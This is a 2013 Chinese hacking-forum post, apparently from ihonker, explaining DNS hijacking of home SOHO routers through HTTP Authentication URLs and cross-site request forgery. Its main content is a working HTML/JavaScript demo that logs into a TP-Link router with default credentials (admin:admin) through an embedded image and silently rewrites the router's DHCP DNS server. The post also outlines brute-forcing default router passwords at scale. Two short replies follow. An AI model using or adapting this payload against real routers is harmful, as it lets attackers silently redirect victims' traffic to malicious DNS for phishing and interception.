查看: 11975|回复: 2

家用soho路由 DNS劫持原理

[复制链接]
  • TA的每日心情
    无聊
    2020-1-16 21:33
  • 签到天数: 175 天

    [LV.7]常住居民III

    发表于 2013-11-26 13:49:02 | 显示全部楼层 |阅读模式
    本帖最后由 Antergone 于 2016-6-19 22:40 编辑

    Http Authentication Url and csrf = Router Hacking !!!
    首先简要的说下什么是Http Authentication,服务端返回一个401状态,并返回一个WWW-Authenticate头。
    1.jpg

    WWW-Authenticate头包含了Http Authentication认证框的一些描叙,如下图

    2.jpg
    在认证框中输入用户名和密码,将密码放入Authorization头中发送
    YWRtaW46YWRtaW4=即是admin:admin的base64编码

    3.jpg
    Http Authentication这一认证过程,实际上早先在所有浏览器中支持以Http Authentication Url的形式访问登陆,即
    http://user:password@url
    而微软为了防止钓鱼URL的问题,出了一个安全补丁,禁止了Http Authentication Url,见
    http://support.microsoft.com/kb/834489

    科普完毕,八下之前的一些东西,前些年看到过国外黑路由的几个案例,其中比较精彩的有flash upnp attack,将内网指定IP的端口给映射出来进行攻击,当然还有部分路由有漏洞也可以将路由的WEB管理端口给映射出来进行攻击,后来FLASH将这个安全漏洞修补了。

    回到正题上,我们知道国内大部分的家用路由都是使用的Http Authentication认证方式,比如我上图中的就是TPLINK路由,虽然IE禁止了Http Authentication Url,但是firefox、chrome等浏览器任然支持Http Authentication Url,同时以标签的形式嵌入Http Authentication Url可以强制Http Authentication认证成功,没有任何安全提示,于是邪恶的攻击方法来了。

    1. 我们可以取国内各种路由的默认IP和默认密码构造一个Http Authentication Url暴力登陆脚本。
    2.使用CSRF修改路由的DNS,指向我们的恶意DNS。

    比如下面这个TPLINK的小DEMO:
    <script>
    function dns(){
    alert('I have changed your dns on my domain!')
    i = new Image;
    i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';
    }
    </script>
    <img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>

    访问tplink.html后!
    4.jpg

    偷偷加入一个8.8.8.8的DNS服务器!
    5.jpg

    想一想,黑客如果用这种攻击方式大规模攻击,将是如何恐怖?弹指一挥间,数万路由被静默修改DNS?
    这是一个普遍的安全问题,您的路由器是否修改好了默认密码,不过值得庆幸的是只有firefox、chrome等浏览器存在此类安全问题。



    相关的技术文章:

    1. 史上最大规模“54DNS劫持”已得到有效遏制

    http://www.itbear.com.cn/ZiXun/2013-05/81995.html

    2. JavaScript安全从浏览器到服务端

    http://vdisk.weibo.com/s/mernF

    3. @ftofficer_张聪 在微博上推荐的Blended Threats and JavaScript: A Plan for Permanent Network Compromise 值得一看:

    http://media.blackhat.com/bh-us- ... nded_Threats_WP.pdf

    http://l4.yunpan.cn/lk/Q5PA6rGSUPUmI

    4. CSRF-苏醒的巨人

    http://vdisk.weibo.com/s/meqNz



    语句构造方法,我就不写了敲了  直接到外面截图发过来。。

    IOZH1S(OS}N0B822PXIUEHS.jpg

    评分

    参与人数 1i币 +10 收起 理由
    90_ + 10

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2013-11-26 13:55:23 | 显示全部楼层
    楼主你在08这么屌 你家人知道不
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-8-22 10:28
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-11-26 14:44:16 | 显示全部楼层
    楼主你在08这么屌 你家人知道不
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 11:44 , Processed in 0.048827 second(s), 20 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部